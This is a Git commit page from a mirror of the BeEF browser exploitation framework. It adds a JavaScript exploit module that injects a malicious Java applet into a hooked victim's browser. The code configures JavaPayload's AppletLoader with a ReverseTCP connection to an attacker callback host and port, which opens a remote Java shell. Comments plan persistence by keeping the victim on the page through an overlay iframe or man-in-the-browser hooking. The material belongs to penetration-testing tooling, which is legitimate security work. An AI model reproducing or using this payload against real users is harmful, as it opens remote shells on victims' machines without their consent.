Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

(Fixes issue 434) First works with the malicious Java applet. Tons of work to come in the next releases (OMG) :-)

Browse Source 
git-svn-id: https://beef.googlecode.com/svn/trunk@1387 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
antisnatchor
2011-11-01 12:06:58 +00:00
parent 8074443730
commit c4d5b30b60
5 changed files with 117 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

54
modules/exploits/java_payload/command.js Executable file
View File

@@ -0,0 +1,54 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var conn = '<%= @conn %>';
var cbHost = '<%= @cbHost %>';
var cbPort = '<%= @cbPort %>';
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/anti.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
beef.dom.attachApplet(applet_id, applet_name, 'javapayload.loader.AppletLoader',
applet_archive, [{'argc':'5', 'arg0':'ReverseTCP', 'arg1':cbHost, 'arg2':cbPort, 'arg3':'--', 'arg4':'JSh'}]);
//TODO: modify the applet in a way we can call a method from it, or create a Javascript variable in the page (to know the applet has started).
//TODO: after that, every N seconds we'll check if the user RUN the applet, otherwise we remove the applet and inject another one.
//TODO: =========== persistence techniques ===========
// the victim must stay on the page while the applet is running. we don't want to use hybrid techniques to
// download platform dependent executable (i.e. meterpreter) and then kill the applet.
// we have 2 options:
// 1. use the MITB code (currently doesn't work on IE)
// 2. create an overlay iFrame while having the applet runnin in the background
//
// 1. setTimeout(beef.dom.createIframe('fullscreen', 'get', {'src':"<%= @iFrameSrc %>", 'id':"overlayiframe", 'name':"overlayiframe"}, {}, null), 4000);
// 2. beef.mitb.init("<%= @command_url %>", <%= @command_id %>);
// var MITBload = setInterval(function(){
// if(beef.pageIsLoaded){
// clearInterval(MITBload);
// beef.mitb.hook();
// }
// }, 100);
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Applet with id[' + applet_id + '] added to the DOM.');
});